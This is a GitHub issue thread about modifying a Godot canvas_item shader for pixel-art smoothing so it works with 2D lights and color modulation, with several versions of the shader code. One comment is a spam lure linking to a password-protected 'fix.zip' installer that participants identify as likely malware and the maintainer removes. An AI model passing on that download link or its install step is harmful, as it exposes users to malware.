### ISSUE TITLE
Improvement proposal to allow 2D lighting and modulation

### ISSUE THREAD

**Issue by Jensolo** [CptPotato/GodotThings#7]
Hey guys,

first of all thanks for the shader, it does a pretty well job. While working with it i stumbled over two main issues:
- Light sources are being ignored (as already highlighted in [issue 5](https://github.com/CptPotato/GodotThings/issues/5))
- Color modulation and font color is not working when applying this shader (as highlighted in [issue 6](https://github.com/CptPotato/GodotThings/issues/6))

I searched some time and came up with a solution which works for me. In case that anyone else stumbles over the same problem, I would like to show how to easily modify the existing shader script to tackle that.

# Include light sources
In order to include light sources, the **render_mode** value has to be changed to **blend_mix**

# Allow color modulation
In order to allow modulation of colors, the original color has to be multiplied with the calculated color of each pixel. To do this, the following line:
`COLOR = texturePointSmooth(TEXTURE, UV, TEXTURE_PIXEL_SIZE);`
has to be replaced by
`COLOR *= texturePointSmooth(TEXTURE, UV, TEXTURE_PIXEL_SIZE);`

# Complete modified script

```python
// IMPLEMENTATION INSTRUCTIONS:
// --------------------------------------------------
// - Apply this shader to each Sprite as a material
// - Set Texture->Filter to 'Linear'
//
// RESOLUTION SETUP:
// --------------------------------------------------
// Project -> Project Settings:
// Viewport Width/Height: Set to pixel art resolution e.g. 320x200
// Window Width/Height override: Set to window size in real pixel, e.g. 1920x1080
// Stretch -> Mode: canvas_items
// Stretch -> Aspect: e.g. keep_width
// Stretch -> Mode: fractional

shader_type canvas_item;
render_mode blend_mix;	// Needed to allow lighting to work

// Automatic smoothing
// independent of geometry and perspective
vec4 texturePointSmooth(sampler2D smp, vec2 uv, vec2 pixel_size)
{
	vec2 ddx = dFdx(uv);
	vec2 ddy = dFdy(uv);
	vec2 lxy = sqrt(ddx * ddx + ddy * ddy);

	vec2 uv_pixels = uv / pixel_size;

	vec2 uv_pixels_floor = round(uv_pixels) - vec2(0.5f);
	vec2 uv_dxy_pixels = uv_pixels - uv_pixels_floor;

	uv_dxy_pixels = clamp((uv_dxy_pixels - vec2(0.5f)) * pixel_size / lxy + vec2(0.5f), 0.0f, 1.0f);

	uv = uv_pixels_floor * pixel_size;

	return textureGrad(smp, uv + uv_dxy_pixels * pixel_size, ddx, ddy);
}

void fragment()
{
	COLOR *= texturePointSmooth(TEXTURE, UV, TEXTURE_PIXEL_SIZE);
}
```

This is a solution that worked for me. In case that you like this, feel free to integrate it as an alternate version or modification.

Best Regards
JensDeBaer

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Jensolo** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

Ok you did not give any explanation and this zip file contains a dll and an exe file. This seems to be some malware. 

@All: Please do not download this. I guess it is some bot placing malware...

**Comment by Jensolo** [comment]
Ok, so bad news. I realized my testing was bad. Multiplying the COLOR in the end does have a bad impact on the color.

It can be used to tackle the Font Color issue, but then you will have to use apply a separate shader to the labels whose font color you want to change.

Sorry for that.

**Comment by CptPotato** [comment]
> @All: Please do not download this. I guess it is some bot placing malware...

Thanks for the heads up, I've removed the comment and reported it as spam. I also removed the link from your quote so nobody ends up accidentally downloading it.

As for the issue itself: I haven't been using Godot actively for quite a while now, and thus didn't keep this repository up to date. I think the changes make sense but I don't know when or if I get back to it in the future.

**Comment by Jensolo** [comment]
Ok, good to know. Thanks for the feedback. In order to keep things straight, I will simply close this issue. In case somebody wants to have a try with my proposal he can use the data from within this issue.

**Comment by luizfelipewd** [comment]
I managed to do the modulation, all you need to do is to export a variable with the modulate_color, and use COLOR = texturePointSmooth(TEXTURE, UV, TEXTURE_PIXEL_SIZE) * modulate_color:


`
// IMPLEMENTATION INSTRUCTIONS:
// --------------------------------------------------
// - Apply this shader to each Sprite as a material
// - Set Texture->Filter to 'Linear'
//
// RESOLUTION SETUP:
// --------------------------------------------------
// Project -> Project Settings:
// Viewport Width/Height: Set to pixel art resolution e.g. 320x200
// Window Width/Height override: Set to window size in real pixel, e.g. 1920x1080
// Stretch -> Mode: canvas_items
// Stretch -> Aspect: e.g. keep_width
// Stretch -> Mode: fractional

shader_type canvas_item;
render_mode blend_mix; // Needed to allow lighting to work

// Export a modulate color
uniform vec4 modulate_color = vec4(1.0, 1.0, 1.0, 1.0);

// Automatic smoothing
// independent of geometry and perspective
vec4 texturePointSmooth(sampler2D smp, vec2 uv, vec2 pixel_size)
{
    vec2 ddx = dFdx(uv);
    vec2 ddy = dFdy(uv);
    vec2 lxy = sqrt(ddx * ddx + ddy * ddy);

    vec2 uv_pixels = uv / pixel_size;

    vec2 uv_pixels_floor = round(uv_pixels) - vec2(0.5f);
    vec2 uv_dxy_pixels = uv_pixels - uv_pixels_floor;

    uv_dxy_pixels = clamp((uv_dxy_pixels - vec2(0.5f)) * pixel_size / lxy + vec2(0.5f), 0.0f, 1.0f);

    uv = uv_pixels_floor * pixel_size;

    return textureGrad(smp, uv + uv_dxy_pixels * pixel_size, ddx, ddy);
}

void fragment()
{
    // Sample the texture with smoothing
    vec4 tex_color = texturePointSmooth(TEXTURE, UV, TEXTURE_PIXEL_SIZE);

    // Modulate the color
    COLOR = tex_color * modulate_color;
}
`

**Comment by luizfelipewd** [comment]
I managed to do that, all you gotta do is to export a variable for the modulate_color, then use COLOR = texturePointSmooth(TEXTURE, UV, TEXTURE_PIXEL_SIZE) * modulate_color.

```gls1
// IMPLEMENTATION INSTRUCTIONS:
// --------------------------------------------------
// - Apply this shader to each Sprite as a material
// - Set Texture->Filter to 'Linear'
//
// RESOLUTION SETUP:
// --------------------------------------------------
// Project -> Project Settings:
// Viewport Width/Height: Set to pixel art resolution e.g. 320x200
// Window Width/Height override: Set to window size in real pixel, e.g. 1920x1080
// Stretch -> Mode: canvas_items
// Stretch -> Aspect: e.g. keep_width
// Stretch -> Mode: fractional

shader_type canvas_item;
render_mode blend_mix; // Needed to allow lighting to work

// Export a modulate color
uniform vec4 modulate_color = vec4(1.0, 1.0, 1.0, 1.0);

// Automatic smoothing
// independent of geometry and perspective
vec4 texturePointSmooth(sampler2D smp, vec2 uv, vec2 pixel_size)
{
    vec2 ddx = dFdx(uv);
    vec2 ddy = dFdy(uv);
    vec2 lxy = sqrt(ddx * ddx + ddy * ddy);

    vec2 uv_pixels = uv / pixel_size;

    vec2 uv_pixels_floor = round(uv_pixels) - vec2(0.5f);
    vec2 uv_dxy_pixels = uv_pixels - uv_pixels_floor;

    uv_dxy_pixels = clamp((uv_dxy_pixels - vec2(0.5f)) * pixel_size / lxy + vec2(0.5f), 0.0f, 1.0f);

    uv = uv_pixels_floor * pixel_size;

    return textureGrad(smp, uv + uv_dxy_pixels * pixel_size, ddx, ddy);
}

void fragment()
{
    // Sample the texture with smoothing
    vec4 tex_color = texturePointSmooth(TEXTURE, UV, TEXTURE_PIXEL_SIZE);

    // Modulate the color
    COLOR = tex_color * modulate_color;
}
